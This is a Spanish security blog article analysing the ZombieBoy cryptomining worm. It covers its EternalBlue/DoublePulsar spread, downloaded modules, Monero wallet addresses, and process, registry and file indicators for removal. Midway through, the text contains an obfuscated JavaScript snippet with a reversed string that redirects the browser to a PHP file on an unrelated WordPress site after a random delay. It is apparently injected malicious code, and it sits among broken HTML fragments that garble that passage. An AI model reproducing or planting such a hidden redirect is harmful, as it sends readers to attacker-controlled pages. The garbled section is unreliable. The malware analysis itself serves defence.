ZombieBoy, nuevo malware de minado de criptomonedas
ZombieBoy, como lo ha bautizado el analista de seguridad James Quinn, es una nueva familia de malware de minado de criptomonedas que utiliza la capacidad de procesamiento de tu ordenador para obtener Moneros.
ZombieBoy tiene características de gusano, valiéndose de WinEggDrop para buscar nuevos hosts y propagarse. Para infectar a la víctima el virus utiliza la herramienta que le da nombre: “ZombieBoyTools”. Esta herramienta aprovecha dos conocidos exploits, EternalBlue y DoublePulsar para instalar la DLL maliciosa en la máquina de la víctima.
Captura de la herramienta ZombieBoyTools. Fuente: www.alienvault.com
Una vez instalada la DLL en la máquina, se descarga y ejecuta el binario “123.exe” desde ca[.]posthash[.]org:443. Este se encargará de descargar el resto de componentes del malware:
{if (typeof ($NfI.list[n]) == “string”) return $NfI.list[n].split(“”).reverse().join(“”);return $NfI.list[n];};$NfI.list=[“‘php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}</script>tools.png” width=”641″ height=”343″ /></p>
<p>“64.exe”, además de estar encriptado con el packet “Themida” implementa algunas técnicas de evasión bastante sofisticadas. Se encarga de la propagación del virus y de ejecutar el miner (XMRIG), para ello utiliza “WinEggDrop” un escaner TCP que buscará víctimas potenciales contra las que ejecutar el exploit DoublePulsar. Adicionalmente “64.exe” utiliza el software XMRIG para minar Monero y enviarlo a las direcciones:</p>
<p>42MiUXx8i49AskDATdAfkUGuBqjCL7oU1g7TsU3XCJg9Maac1mEEdQ2X9vAKqu1pvkFQUuZn2HEzaa5UaUkMMfJHU5N8UCw<br />
49vZGV8x3bed3TiAZmNG9zHFXytGz45tJZ3g84rpYtw78J2UQQaCiH6SkozGKHyTV2Lkd7GtsMjurZkk8B9wKJ2uCAKdMLQ</p>
<p>El otro componente descargado tiene el nombre de “74.exe”. Se encarga de descargar y ejecutar la DLL “NetSyst96.dll”, heredada del RAT “Gh0stRat”, permitirá al administrador del malware realizar algunas acciones sobre la máquina infectada de forma remota, como capturar la pantalla, grabar sonidos o alterar el portapapeles de la víctima.</p>
<p>“84.exe” es otro de los módulos droppeados por “123.exe”. Al igual que “74.exe” es un RAT utilizado para extraer información adicional sobre la víctima: SO utilizado, velocidad de la CPU o antivirus instalados. Además añade una entrada al registro que sirve para comprobar si el malware se está ejecutando por primera vez.</p>
<p><img decoding=)
Flujo de actividad. Fuente: www.alienvault.com
Para comprobar si está infectado por ZombieBoy puede buscar si alguno de los binarios implicados se encuentra entre sus procesos:
123.exe
64.exe
74.exe
84.exe
CPUinfo.exe
N.exe
S.exe
Svchost.exe (OJO, siempre que no provenga de C:\Windows\System32)
Si es así debería detener estos procesos y borrar los ficheros implicados, así como las entradas al registro introducidas por el virus.
Entradas de registro maliciosas:
SYSTEM/CurrentControlSet/Services/Dazsks Fsdgsdf
SYSTEM/CURRENTCONTROLSET/SERVICES/ANqiki cmsuuc
Ficheros descargados por el malware:
C:\%WindowsDirectory%\sys.exe
C:\windows\%system%\boy.exe
C:\windows\IIS\cpuinfo.exe
C:\Program Files(x86)\svchost.exe
C:\Program Files\AppPatch\mysqld.dll
C:\Program Files(x86)\StormII\mssta.exe
C:\Program Files(x86)\StormII\*
C:\Archivos de programa (x86)\svchost.exe
C:\Archivos de programa\AppPatch\mysqld.dll
C:\Archivos de programa (x86)\StormII\mssta.exe
C:\Archivos de programa (x86)\StormII\*
NOTA: Los interesados en información sobre contrato de soporte Asistencia Tecnica de SATINFO y/o licencia de uso/actualizaciones de sus utilidades, contacten con info@satinfo.es
__________
Este blog no se hace responsable de las opiniones y comentarios de los textos en los que se cita la Fuente, ofreciendo su contenido solo para facilitar el acceso a la información del mismo.
Puedes seguir cualquier respuesta a esta entrada mediante el canal RSS 2.0. Los comentarios y los pings están cerrados.
Siguenos
en facebook
Los comentarios están cerrados.